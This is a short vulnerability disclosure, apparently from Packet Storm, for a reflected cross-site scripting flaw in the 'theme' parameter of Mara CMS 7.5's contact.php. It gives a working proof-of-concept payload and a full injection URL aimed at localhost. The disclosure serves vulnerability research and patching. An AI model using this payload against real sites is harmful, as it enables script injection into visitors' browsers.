Mara CMS 7.5 Cross Site Scripting

Mara CMS version 7.5 suffers from a cross site scripting vulnerability.

MD5 | 9fb48d350011f3aed4c31764dd7e0c36

Download

==============================================================================
| # Title     : Mara CMS 7.5 Cross Site Scripting                            |
| # Author    : George Tsimpidas                                             |
| # Tested on : Kali Linux (X64)                                             |
| # Vendor    : https://sourceforge.net/projects/maracms/                    |
==============================================================================

PoC


[+] Use Payload : seven69387';alert(1)//154

Path : http://localhost/contact.php?theme=< inject payload here>

Full Poc :
http://localhost/contact.php?theme=seven69387';alert(1)//154

Source: packetstormsecurity.com